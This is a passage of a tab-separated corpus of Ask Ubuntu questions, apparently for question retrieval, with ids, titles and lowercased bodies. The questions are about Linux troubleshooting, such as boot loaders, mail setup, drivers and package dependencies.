243487	sendmail not working on ubuntu guest - unqualified host name	i have a win7 host running ubuntu guest through vbox . it is configured with a bridged network adapter and i am using dhcp to assign an ip of 192.168.0.5 to the guest which is mapped to smartstart.dev in my windows hosts file . i havent done anything to hosts on the ubuntu side . i am testing a website and need sendmail working . i have installed sendmail , but the mails are n't being sent . when i look through the mail error logs i can see lots of lines like this : jan 14 17:00:01 djw-ss sm-msp-queue [ 2771 ] : my unqualified host name ( djw-ss ) unknown ; sleeping for retry jan 14 17:01:02 djw-ss sm-msp-queue [ 2771 ] : unable to qualify my own domain name ( djw-ss ) -- using short name can anyone tell me how to get this working ? strange thing is i have a similar setup on another vb - i dont think i 've done anything different and it works just fine out of the box .
243489	make unity 3d work with my old ati mobility radeon 9700	i ca n't make unity 3d work on my old powerbook with a mobility radeon 9700 . the only option on powerpc is opensource drivers ( afaik ) . so everything is setup now and graphic acceleration appears to work as expected ( tested using glxgears -info ) . unity_support_test -p shows unity 3d supported : yes however , when i launch unity , the following line is displayed : compiz ( core ) - info : unity is not supported by your hardware . enabling software rendering instead ( slow ) . no other logs indicates that my graphic card is missing some feature . then , unity failed miserably ( llvmpipe does not exists on powerpc ) . the question is : why unity_support_test tell that unity is supported , but not unity ? are they out of sync ? i got this problem with 12.10 first , but i am now trying with 13.04 and got the same behavior . if i run unity_support_test with the -i ( -- indirect ) option , then i have unity 3d supported : no because gl vertex buffer object : no i am not sure why i have a different result because of the -i option , but is there any workaround ?
243491	how can i disable all console display on my nexus 7 ?	i am writing some code to address the raw framebuffer and would like to suppress all writing to the display including anything at boot . i have tried to use abootit to set the kernel parameters to suppress screen output , e.g . console=null , nosplash and so on , but i end up with an infinite reboot cycle and have to restore the 8 mb boot partition every time . what is the proper way to ensure that nothing writes to the display except for what i directly specify ?
243493	ca n't boot ubuntu 12.10 live session usb in uefi mode on my dell inspiron 15z 5523 ultrabook	( before everything , i 'm french , so sorry for my english in advance ) hello , i 'm facing a lot of problems for installing ubuntu 12.10 on my new laptop dell inspiron 15z 5523 ( ultrabook ) . it seems that all my problems come from the fact that i ca n't boot my ubuntu liveusb in uefi mode . when i boot my liveusb in uefi mode , i have a blank screen and nothing happens ( i precise that i tried with all the following combinations : secure boot enabled/disabled / fastboot enabled/disabled ) . but i 'm able to boot in legacy mode and i did ( many ) installations from this mode , and use the boot repair tool to convert my intallation in uefi mode . but if i boot the fresh installed ubuntu in uefi mode , i have a blank screen ( a purple one ) . my conclusion is that i ca n't boot ubuntu in uefi mode either with ubuntu installed version or ubuntu live session . it 's very annoying , because i do n't see how to install a dual boot with windows 8 in uefi mode and a ubuntu in legacy mode . here is one of my first boot repair report : http : //paste.ubuntu.com/1518490/ i have also some error messages with the following packages when i apply commands asked by the boot repair : grub-efi-amd64 grub-efi i 'm hopeless . any help is welcome ! edit 1 - `` solution '' = `` do nothing '' ! solved or `` bypassed '' , it 's as you want . the fact is that ubuntu does n't work in uefi mode on my dell laptop . so i booted my live-usb in legacy mode and installed ubuntu normally ( with a bios_grub partition unformatted of 2 mo ) . now i m able to switch os simply switching the bios mode ( uefi/legacy ) entering in the bios . the bug is still there , but i have what i need . my problems came from the fact that after each installation i used the boot repair tool which deleted the access to one of my os .
243494	how do i figure out which process is causing a beeping sound ?	i 'm using 10.04 and some process is periodically causing a sound ( more like a chime than a beep ) and i ca n't figure out what it is . i do n't want to turn off system beeps or sound in general , i just want to get this particular beeping to stop . i have tried looking in /var/log/user.log and /var/log/syslog but dont see anything obvious other than perhaps : jan 13 15:45:16 awhitt-66131 pulseaudio [ 5606 ] : ratelimit.c : 130 events suppressed however searches on this have n't turned up anything enlightening . how can i track down which process is making these sounds ?
243497	high temperature on an hp dv4-5110tx	i recently installed ubuntu 12.10 on my hp dv4-5110tx laptop . it has intel hd 400 and nvidia geforce gt 630m with optimus gpus.my laptop remain cool most of the time when i use windows 7 but when i start using ubuntu , it 's temperature increases a lot . now i am concerned about it . what is the solution for this ? is this normal ? or do i have to install any driver ?
243499	how do i set up a xen bridge ?	i have been reading various pages on how to set up the network for xen . unfortunately , none of them actually have a full example config . they clearly show what the xenbr0 section should look like , but not how you should change the eth0 after mentioning : note ! the ip configuration of the bridge device should replace the ip configuration of the underlying interface , i.e . remove the ip settings from eth0 and move them to the bridge interface . eth0 will function purely as the physical uplink from the bridge so it ca n't have any ip ( l3 ) settings on it ! i have tried many configurations that all fail ( after running /etc/init.d/networking restart , there is no normal netowork access and ca n't ssh in or out ) . here is my current config : auto lo iface lo inet loopback auto xenbr0 iface xenbr0 inet static bridge_ports eth0 address 10.0.0.3 netmask 255.0.0.0 broadcast 10.255.255.255 gateway 10.0.0.1 auto eth0 iface eth0 inet manual perhaps that is correct and i just need to set up some iptables forwarding rules ? i tried running the command sudo iptables -i forward -m physdev -- physdev-is-bridged -j accept but i recieved an error message that -- physdev-is-bridged is not a recognized option . the debug output of restarting the network gives the following output : reconfiguring network interfaces ... waiting for xenbr0 to get ready ( maxwait is 32 seconds ) . rtnetlink answers : no such process failed to bring up xenbr0 ssh stop/waiting ssh start/running , process 3775 i have checked that xenbr0 already exists because when i try to create a bridge with that name , brctl tells me it ca n't create as one already exists .
243502	regular expressions with square brackets in gnome search	i use gnome-search-tool for searching files/folders . there i can put regular expression to filter through file names . i need some help with my custom filter ( search ) . my folders have format : myfolder [ year ] [ language ] . how can i search for folders which name contains : [ year1 ] and [ language1 ] [ language1 ] or [ language2 ] from [ year1 ] to [ year2 ] any help will be appreciated !
243503	media library management and video bookmarks	i am looking for a media library management software which will allow me to : edit video/audio tags add video/audio bookmarks , like : name : shutter island time : 1:41:43 comment : lighthouse encounter scene search among the database , including tags and ( possibly ) bookmarks jump from one bookmark to another just like you would in a web browser also , it would be great to have a decent associated media player , possibly with time stretch and ab-repeat ( but maybe i 'm asking too much ) . i am using ubuntu 11.10 ( but i have no problem upgrading , if needed ) .
243504	unoconv and libreoffice	i have installed unoconv in my ubuntu with libreoffice . but i need to know what are the parts of libreoffice i really need to install . because i do not want to install libreoffice whole . this unoconv , will work within a server . converting files from rtf to html and html to rtf and some files in doc format what packages will i need to install from libreoffice ?
243508	/home/user/www file permssion	in /etc/apache2/sites-available/default i made the /home/me/www folder my localhost location . i have downloaded drupal into the new www/drupal folder and even though i gave all permissions ( 777 ) apache still ca n't write to it . do i need to make another permission change ? to make localhost not 403 , i followed the steps in : http : //askubuntu.com/a/232078/25656 sudo apt-get install acl you can use man setfacl to have more info . to add permissions to apache : sudo setfacl -m d : g : www-data : x , g : www-data : x /home/me sudo setfacl -m d : g : www-data : x , g : www-data : x /home/me/dropbox sudo setfacl -rm d : g : www-data : rx , g : www-data : rx /home/me/dropbox/web` /etc/apache2/sites-available/default â http : //paste.ubuntu.com/1534943/ .
243512	how to get the battery indicator to display the correct percent ?	on my samsung series 5 ultrabook the battery is n't giving me the right percent . when it is plugged in the battery indicator does not move , it stays the same . any other panel apps that could display the battery more accurately ? any help guys ? running 12.10 kevingutt @ kevin : ~ $ upower -d device : /org/freedesktop/upower/devices/line_power_adp1 native-path : /sys/devices/lnxsystm:00/device:00/acpi0003:00/power_supply/adp1 power supply : yes updated : tue jan 15 12:43:33 2013 ( 5181 seconds ago ) has history : no has statistics : no line-power online : yes device : /org/freedesktop/upower/devices/battery_bat1 native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c09:00/pnp0c0a:00/power_supply/bat1 vendor : samsung electronics power supply : yes updated : tue jan 15 14:09:38 2013 ( 16 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 38.8574 wh energy-empty : 0 wh energy-full : 43.66 wh energy-full-design : 45.288 wh energy-rate : 12.2914 w voltage : 8.071 v time to full : 23.4 minutes percentage : 89 % capacity : 96.4052 % technology : lithium-ion history ( charge ) : 1358276948 89.000 charging 1358276918 90.000 charging history ( rate ) : 1358276978 12.291 charging 1358276948 12.580 charging 1358276918 12.957 charging 1358276888 13.712 charging daemon : daemon-version : 0.9.17 can-suspend : yes can-hibernate yes on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no and i do not have a bluetooth mouse attached .
243517	how do i fix `` e : type 'b-src ' is not known on line 'x ' in source list '' error ?	this is the error i 'm getting from using sudo apt-get update e : type 'b-src ' is not known on line 2 in source list /etc/apt/sources.list.d/tiheum-equinox-precise.list how can i fix this ?
243518	what exactly do the 'allow-discards ' and 'root_trim ' linux parameters do ?	a lot of ssd-related instructions online currently say you should add allow-discards and root_trim=yes to your grub_cmdline_linux . i have yet to find one that says why you should do that , i.e . what exactly ( if anything ! ) do those parameters do . where is the documentation on this and what does it say about those two parameters ' purpose ? according to cryptsetup 1.4.0 release notes , since kernel 3.1 , dm-crypt devices optionally ( not by default ) support block discards ( trim ) commands . if you want to enable this operation , you have to enable it manually on every activation using -- allow-discards cryptsetup luksopen -- allow-discards /dev/sdb test_disk but is it the same when passed to the kernel ( via grub_cmdline_linux ) ? edit : kernel.org 's list of kernel parameters does n't ( currently , jan 2013 , at least ) have either of these options .
243524	ubuntu one : put to upload a file which is larger than 16302 bytes fails systematically	i am trying to create an app to upload/download files to ubuntu one , using the cloud api . now i am at the point of implementing the upload part of the app , and i have this problem with my test case : all files under 16303 bytes are uploaded with no problem whatsoever . all files above 16303 bytes systematically fail to upload , with a 500 status code being returned . i spent hours searching the web for a similar problem , to no avail . i am using go language , and here is the call to ubuntu one rest api ( error handling and housekeeping code removed for conciseness ) : // 'n ' is an object which describes the file to upload ( path , size , etc . ) file , _ : = os.open ( localtargetdir + n.path ) apiurl , _ : = url.parse ( `` https : //files.one.ubuntu.com/content '' + remotetargetdir + n.path ) // following line returns a pointer to a request object with the `` authorization '' // fields in the header all properly set request , _ : = ubuntuonegetsignedrequest ( `` put '' , apiurl.string ( ) , file ) request.header.add ( `` content-length '' , fmt.sprintf ( `` % d '' , n.size ) ) request.header.add ( `` content-type '' , `` application/octet-stream '' ) response , _ : = http.defaultclient.do ( request ) if response.statuscode > = 300 { return errors.new ( fmt.sprintf ( `` error ( status= % d ) creating remote file : % s '' , response.statuscode , n.path ) ) } // ... as said , a file size of 16303-16304 bytes is the pivot point where the upload will begin to fail systematically . i have no idea where the problem lies .
243525	how to disable postfix spf from rejecting mail ?	i am having an issue with postfix and spf that i ca n't seem to figure out . i have installed spf for postfix using the guide on this link ( postfix-policyd-spf-perl ) . however , i do n't want postfix or mail : :spf to `` reject '' mail if it fails . all i want it to do is add the authentication result to the emails header like it normally does . i have tried to find a config file for postfix-policyd-spf-perl but i ca n't seem to locate anything . below is an example of the rejection message : mail.xxxxxx.com # < mail.xxxxxxxx.com # 5.7.1 smtp ; 550 5.7.1 < xxxxx @ xxxxxxxxx.com > : recipient address rejected : please see http : //www.openspf.net/why ? s=mfrom ; id=xxxxxx @ xxxxxxx.com ; ip=xxx.xx.xx.xxx ; r=mailer > please help ! thanks !
243528	what is the solution to laggy scrolling on a computer with low specs ?	this is my first ubuntu os - 12.04 . i have a 2.79ghz pentium d processor ( quite an old one ) and 1.24 gb of ram ; only integrated graphics card ( 96 mb or something ) . there is a noticeable lag when i am scrolling through any app especially firefox and chromium ) . i typed about : support in the firefox address bar and the graphics section had this : adapter description tungsten graphics , inc -- mesa dri intel ( r ) 865g x86/mmx/sse2 vendor id tungsten graphics , inc device id mesa dri intel ( r ) 865g x86/mmx/sse2 driver version 1.3 mesa 8.0.2 webgl renderer blocked for your graphics card because of unresolved driver issues . gpu accelerated windows 0 . blocked for your graphics card because of unresolved driver issues . so what should i do ? should i install 10.04 cause my system is too old ? thanks in advance .
243529	ca n't install any os on old laptop	the laptop is an asus a4l ( a4000 series , it 's old ... ) . i ran memtest , its ok ( got brand new rams ) . tried following oses so far : win xp , win 7 , ubuntu , debian , all newest versions and service packs . win xp : throws errors all the way trough install ( ca n't read files ) , it gets to the desktop eventually but it 's not ideal win 7 : black screen on boot after post ubuntu : black screen on boot after post debian : black screen on boot after post i would like to use ubuntu on this laptop . could someone recommend me an ubuntu version that works with this laptop ? or any ideas about the black screen ? edit : ubuntu 10.04.4 lts started with the options menu ( install , check disk , memory , etc ) after i select the live boot option , screen turns black . edit : ubuntu 10.04.4 lts install ran just fine , and at the end it gave me a ton of this : end_request : i/o error , dev sdb , sector 4007 i would guess dead hdd , but i tried it with an external hdd too , and it gave the same error after install . edit : removed the hdd , now it boots from a live disk , i was able to get to the ubuntu 10.0.4 desktop . i tried installing ubuntu from there , to an external hdd , but on rebooting i got the same error as before : end_request : i/o error , dev sdb , sector xxx after booting from the external hdd , i get this error after the post : grub out of disk
243530	ubuntu 12.04 usb speaker static	i 'm using ubuntu 12.04 , and just attached new arctic sound s111 usb speakers . there is persistent background static in the sound that changes in intensity depending on what i 'm doing on the computer . i notice similar static while using headphones and having a usb flash drive plugged in , so i assume it is an error with the usb . i 've tried rebooting with the device installed , installing phonon-backend-vlc , and muting the microphone using alsamixer , all to no avail . does anyone have any advice about this ? thanks in advance .
243532	apache tomcat webapps have to use a proxy	i 've installed apache tomcat and want to use a proxy for my webapps . some apps request data from the internet , they do n't have an own/internal possibility to use a proxy . i added the following lines at the beginning of my startup.sh : catalina_opts= '' $ catalina_opts -dhttp.proxyhost=foo.bar '' catalina_opts= '' $ catalina_opts -dhttp.proxyport=3128 '' but these settings do n't seem to work . server version : apache tomcat/7.0.34 jvm version : 1.6.0_24-b24 ubuntu 10.04.4
243533	gnome 3.6 lockscreen from unity	i would like the gnome 3.6 lockscreen ( gdm 3.6.1 ) to be called from unity . i am not a expert , but my impression is that the lockscreen is part of gdm as opposed to gnome shell . if this is true ( again , i am not sure about that ) , then how can i get that lockscreen to be called from within unity ? i already set gdm in place of lightdm . thank you !
243535	how to configure grub for triple boot : ubuntu 12.10 , windows 7 and rhel server 6.3	i just purchased a new sony vaio laptop so i can play around with linux during the day while pretending to do my job . ideally i 'd like to be able to run windows 7 , ubuntu and red hat on this machine … at the very least . i’ve divided my 256gb ssd into four partitions : 500mb boot drive 50gb partition for windows 7 43gb partition for future use 157gb extended partition subdivided into two physical volumes ( one for red hat and one for ubuntu ) i 've created a volume group named vg_rh for the red hat physical volume and a volume group named vg_ubuntu for the ubuntu physical volume . i 've installed red hat on three logical volumes within the vg_rh group : lv_rh_root ( / ) lv_rh_home ( /home ) lv_rh_swap the red hat boot drive ( /boot ) is mounted on the first primary partition above . i 've similarly installed ubuntu on four logical volumes within the vg_ubuntu group : lv_ub_root lv_ub_home lv_ub_swap lv_ub_boot i’m not sure if this was really such a great way to organize everything , but so far i’ve been able to boot into red hat and windows just fine from the grub version 0.97 menu . however i’m having a hard time figuring out how to add ubuntu to the list of operating systems in the grub menu . here are the contents of the grub.conf file : title red hat enterprise linux ( 2.6.32-279.el6.x86_64 ) root ( hd0,0 ) kernel /vmlinuz-2.6.32-279.el6.x86_64 ro root=/dev/mapper/vg_rh-lv_rh_root nomodeset rd_lvm_lv=vg_ubuntu/lv_ub_swap keyboardtype=pc keytable=us lang=en_us.utf-8 rd no_luks sysfont=latarcyrheb-sun16 crashkernel=128m rd_lvm_lv=vg_rh/lv_rh_swap rd_md_uuid=a0bdf209:5c03cb84:36ee492f : a8dbd731 rd_lvm_lv=vg_rh/lv_rh_root rd_md_uuid=795f29cc:0b48c395:98447868:144877f2 rd_no_dm rhgb quiet initrd /initramfs-2.6.32-279.el6.x86_64.img title windows 7 rootnoverify ( hd0,1 ) chainloader +1 title ubuntu 12.10 root ( hd0,0 ) kernel /vmlinuz-3.5.0-17-generic ro root=/dev/mapper/vg_ubuntu-lv_ub_root rhgb quiet initrd /initrd.img-3.5.0-17-generic
243541	changing ordering of os in grub	i have recently installed linux mint along with my ubuntu . the grub has replaced mint as the default os . how can i set ubuntu as the os that loads automatically again ?
243546	how to restart every 30 minutes automatically ?	i would like to schedule a restart of my ubuntu every 30 minutes . is there any command or a graphical way to do it ?
243549	lenovo t500 suspend issue due to network manager ?	i use a lenovo thinkpad t500 with ubuntu 12.10 installed . i have a strange problem . often when i go to sleep at night and forget to plug my laptop in , i find in the morning that my laptop is completely dead . but other mornings it seems fine . checking the /var/log/pm-suspend.log i find that every time i close my laptop the log reports : 'running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed ' i was wondering if its possible that my network interfaces not going to sleep may kill my laptops battery overnight if it is not completely charged ? if so , would it be better to switch my network card drivers or find an alternate suspend method ? thank you for any help you can provide .
243552	how can i improve my boot time ? ( bootchart and dmesg output included )	i 've noticed that my boot time lately has been unusually slow . i am running 12.04 a laptop with a 2.40ghz cpu and 4gb of ram . i 've run bootchart and dmesg , but i 'm not sure how to use them to address the issue . here 's the bootchart : here 's the dmesg output ( it was too long to paste here ) : http : //pastebin.com/bspntsux . any help would be much appreciated . let me know if i can provide any more information . thanks in advance .
243558	how do i get and keep access to encrypted home dir on an external drive ?	i have a clean new install of 12.04 on my internal drive . on my external drive i have everything that used to be on this drive . the file i 'm concerned with right now is my old home folder from 10.04 . when i open it with nautilus it allows me change the permissions but when i get inside the old home folder i have 2 items , access-your-private-date.desktop and readme.text . this is what readme.text says : this directory has been unmounted to protect your data . from the graphical desktop , click on : `` access your private data '' or from the command line , run : ecryptfs-mount-private i tried entering that last line into a terminal and nothing changed . what am i doing wrong ?
243559	ubuntu 10.04 xen default version	what is the default xen version from ubuntu 10.04 ? the idea is that i need an ubuntu version where i can install with no problems xen 3.x .
243560	ubuntu removed by easybcd but is still appearing in boot menu	i have removed ubuntu 12.10 from my system with easybcd and deleted the partition containing ubuntu . still when i start my system it gives me the option to load into either windows 7 or ubuntu . while loading into ubuntu it throws errors , obviously because the files do not exist . in easybcd i see this format of my bootloader : there are a total of 2 entries listed in the bootloader . default : ubuntu timeout : skipped easybcd boot device : c : \ entry # 1 name : windows 7 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.exe entry # 2 name : ubuntu bcd id : { default } device : unknown bootloader path : \ubuntu\winboot\wubildr.mbr my question is how to remove this from my system so that when i switch it on i directly get to windows 7 .
243563	black screen during installation ubuntu 12.10 via wubi on hp pavillion g6-1273s1	i tried to install ubuntu 12.10 alongside win7 ( 64bit ) on hp pavilion g6-1273sl . the installation process went well until the `` reboot '' step . the computer rebooted and started to processing something in dos mode . after he was finished the screen went black and the last thing i heard was the drumming sound , i think it is the sound when you enter ubuntu . i waited for about 10 minutes and nothing happened , i tried to press enter or space key , but nothing happened . then i force shutdown the computer and tried to turn it back on . then i was asked if i want to run ubuntu or win 7 , i choose ubuntu and the purple blank screen appeared , then appeared the loading dots and after that the black screen again . anyone help ? p.s . sory for bad english : )
243565	rename default user directories	is it possible to rename default directories like ~/documents , ~/music , ~/videos ? especially i want to rename videos to movies . thanks in advance !
243568	nginx dependency problem trying to upgrade	trying to upgrade my ubuntu 12.04 vps i get the following error : henrik @ neung : ~ $ sudo apt-get upgrade [ sudo ] password for henrik : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : nginx-full : depends : nginx-common ( = 1.2.4-1ubuntu0ppa2~precise ) but 1.2.4-2ubuntu0ppa1~precise is installed e : unmet dependencies . try using -f. so i try to run this : henrik @ neung : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : nginx-full the following packages will be upgraded : nginx-full 1 upgraded , 0 newly installed , 0 to remove and 42 not upgraded . 2 not fully installed or removed . need to get 0 b/441 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of nginx-full : nginx-full depends on nginx-common ( = 1.2.4-1ubuntu0ppa2~precise ) ; however : version of nginx-common on system is 1.2.4-2ubuntu0ppa1~precise . dpkg : error processing nginx-full ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of nginx : nginx depends on nginx-full | nginx-light ; however : package nginx-full is not configured yet . package nginx-light is not installed . dpkg : error processing nginx ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : nginx-full nginx e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anybody help fix this ?
243569	how do i preserve xubuntu while installing windows	im looking to get windows 7 starter running on my laptop again as a dual boot so that i can run some windows programs that wine and cross-over wont run . what would be the best advice on how to do this ? i have a key that i can use from when i originally got the laptop and i can only use usb to install . ive heard that installing windows can wipe out xubuntu completely and you have to install xubuntu again ( not sure if its true or not ) but would like to avoid this as i dont have much free time to be sorting out everything all over again .
243574	ubuntu on thinkpad . erase recovery partition and burn a recovery cd instead	i want to turn my dual-boot thinkpad t400 winxp + ubuntu 12.10 into single ubuntu machine , i.e . delete windows and recovery partitions , and use all the disk space for ubuntu . before doing so , i would like to create a recovery media ( cd/dvd or backup to external hd ) . and here a problem starts . lenovo provides rescue and recovery software that makes possible to create recovery disk in windows . however , i can not use it to create recovery cd because after installing ubuntu the software does not see the recovery partition and can not copy the data to a cd . i think it is related to this : http : //www.thinkwiki.org/wiki/rescue_and_recovery the service partition is visible in grub but it does not start when run ( i guess it 's the thing described in the link above ) . however , in windows nor in ubuntu the partition is not visible , and i do not know how to access it . does anyone have an idea what to do in order to create the recovery media and what things later have to be done when i would like to use it ? the best option for me would be if , i could also be able to create a windows virtual machine form this recovery media . any ideas ? thanks !
243575	how do i access ntfs partitions from ubuntu after upgrading from windows server 2008 ?	after having my own server at home for a year now i am ready to take the step and replace my windows server 2008 environment with ubuntu . my server 's hard drive is partitioned into three partitions , one for the os and two for data of different kinds . my biggest concern about this change is how it will affect the other partitions on my server , the ones holding the data . since they are ntfs partitions i am afraid that my data will be unreachable from ubuntu or that the partitions will have to be reformatted due to the installation of ubuntu . any help is much appreciated . edit : current setup is like this : no raid , one physical disk of 500gb partition 1 - ntfs - operating system and software parition 2 - ntfs - storage , mainly data related to webserver/mailserver , short term storage . partition 3 - ntfs - storage , larger data for long term storage .
243580	packaging commercial application	i 'm developing a project tracking application that i intend to release not far in the future as a commercial ( for purchase ) app in the software center . i 'm just trying to figure out how to best package it for submission , but the description for this is vague at best : is there a straightforward packaging guide for commercial software ? ( no compilation , just stuff my folder into the /opt/appname directory on install ) .
243581	how do i not lose focus when an application in another workspace opens a dialog ?	i have applications open in multiple workspaces . i have a java application running in a different workspace and it opens a dialog window . this causes my current application to lose focus . i do not get the notification that a new window is ready like i usually see in gnome3 . how do i prevent the current application from losing focus when another application opens a dialog ? i am using : ubuntu 12.04 gnome 3.4.1
243582	trying to convert mkv to mp4 with avconv , failing	i am trying to convert an mkv file to mp4 to be compatible with my ps3 . i am using : avconv -i file.mkv -c copy file.mp4 it fails and i get the following error : [ mp4 @ 0x8a17c00 ] pts < dts in stream 0 av_interleaved_write_frame ( ) : invalid argument the file is h264 video and ac3 audio .
243585	how will the ubuntu phone sdk impact desktop development	if i was to develop an application for ubuntu after the ubuntu phone announcement , i would be concerned with several issues . i know that these things will not change immediately , but i 'm thinking about the strategic decision to ensure good support from canonical . will qml/qt be the way forward now also for the desktop environment ? is quickly now a tool of the past ? what languages will be the preferred languages ? is c++ and javascript the way for the future while python and vala might not be the most strategic choices ? how will this affect existing apis ? will the traditional model with libraries change ?
243587	webkit2.h , what package does it reside in ?	i 'm trying to compile gthumb from source and enable all extensions , and i can not get the webkit dependency resolved . i 've installed all of the webkit development libraries i can seem to find to no avail . specifically , it 's looking for webkit2/webkit2.h . does anyone know what package that would be found in ?
243590	how do i get wakeonlan working when my network controller uses the sky2 module ?	i have an aopen i945gmm-hl motherboard . it still works fine , and the bios is set to allow wakeonlan to power up the machine but since a recent os update those magic packets just do n't work anymore . here 's the output of lspci -v for the nic : 03:00.0 ethernet controller : marvell technology group ltd. 88e8053 pci-e gigabit ethernet controller ( rev 22 ) subsystem : aopen inc. device 0607 flags : bus master , fast devsel , latency 0 , irq 43 memory at fdefc000 ( 64-bit , non-prefetchable ) [ size=16k ] i/o ports at ce00 [ size=256 ] [ virtual ] expansion rom at fdd00000 [ disabled ] [ size=128k ] capabilities : [ 48 ] power management version 2 capabilities : [ 50 ] vital product data capabilities : [ 5c ] msi : enable+ count=1/2 maskable- 64bit+ capabilities : [ e0 ] express legacy endpoint , msi 00 capabilities : [ 100 ] advanced error reporting kernel driver in use : sky2 running ver . 3.4.6-1 of the kernel .
243593	apt-mirror : illegal division by zero	i 'm trying to set up an apt-mirror service for an offline repository but i 've hit a weird error . i edited my mirror.list file to contain the proper paths ( a usb drive mounted at /media/ubuntu ) but when i try to run apt-mirror , i get the following : $ sudo apt-mirror /etc/apt/mirror.list argument `` m-bm- `` is n't numeric in numeric lt ( < ) at /usr/bin/apt-mirror line 204 . downloading 982 index files using â threads ... illegal division by zero at /usr/bin/apt-mirror line 209 . any ideas as to what this could mean ?
243594	unable to install wine on 12.10 64-bit	these commands did not work for me as discussed in this question : sudo apt-get install wine [ sudo ] password for shami : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages .
243595	ca n't install intel fortran	i have installed package parallel studio xe 2013 update1 on my ubuntu 12.04 system in order to install cmaq software and ioapi3.1 . but when i type ifort in my terminal it says : ifort : command not found . what should i do to activate my intel fortran ?
243602	how do i re-install or delete 64-bit 12.10 and install 32-bit	iâm a new user to linux and so i used the automatic windows dual boot installer and it installed ubuntu 64-bit 12.10 on my xp computer . but some of the xilinx programs i need to run require 32-bit . so i need to either re-install or delete it and start over . i 've created a clean 32-bit ubuntu install dvd but when i run it , it does n't recognize that i already have a 64-bit version of ubuntu installed so it does n't give me a way to delete it . there is the other option that should allow me to delete the partition but it does n't show an ubuntu partition , just a 150m windows partition . i do n't care about anything in the ubuntu directories so a full erase is okay . i ca n't seem to find any description on the web that match my problem so i 'm not sure how to proceed .
243603	if i stop moving my ( usb ) mouse , it stops working until i click	i have a usb microsoft mouse that works fine on windows , but on ubuntu it stops working if i stop using it for three seconds ( literally , i counted ) . at this point , i am unable to move it , i have to click , almost as if it wake the mouse up . and that sucks because apparently that click is a legit click and i end up closing out of stuff sometimes ... anyway , please help if you 've ran into this sort of problem before . i know that there 's a chance that this is just an unsolvable hardware issue that i might just have to live with ( or write a driver ) . thanks in advance for your time .
243605	two appearance icons in settings	there 's two appearance icons in my settings . both of them work at first time and then when i click again , force close appears . how can i remove one ?
243606	why does /var/lock/tt-rss keep being deleted after reboot ?	i use sudo mkdir /var/lock/tt-rss/ to create this folder which a program called tiny rss needs . but if i reboot ubuntu , the lock and tt-rss folders no longer exist . it 's as if ubuntu is treating them like temp folders . i need /var/lock/tt-rss/ to be a permanent folder . how can i make it stay ? i could probably do a startup entry , but that seems more of a workaround than a fix .
243607	how does nautilus mount windows network drives ?	when i browse my local network , i can access the windows drives of a windows machine without any issue . everything is visible , shared or not shared folders . i have full permissions . i notice that accessing a drive from a machine ( drive d from machine xyz ) , nautilus makes a mount of that drive . hovering in nautilus over the mount point i see : smb : //xyz/ $ d/ and name of the mount point is : d $ on xyz . the actual mount point is : ~/.gvfs/d\ $ \ on\ xyz/ . now , my question is . how can i script that without using mount points . script should do : mount , copy something , unmount . i require this for a back-up solution using pool rather then push . thanks
243610	malformed line in source list	whenever i use the command sudo apt-get update , it shows up the following errors : e : malformed line 13 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . the update manager also does n't open and shows errors . here is my sources.list : # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu universe deb http : //archive.ubuntu.com/ubuntu-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu multiverse deb http : //archive.ubuntu.com/ubuntu-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security restricted main multiverse universe deb http : //archive.ubuntu.com/ubuntu maverick main universe restricted multiverse deb http : //archive.ubuntu.com/ubuntu maverick-updates universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu maverick-proposed universe main multiverse restricted deb http : //archive.ubuntu.com/ubuntu maverick-backports universe main multiverse restricted this is the modified sources.list : # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu maverick main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu-updates maverick main restricted # # n.b . software from this repository is 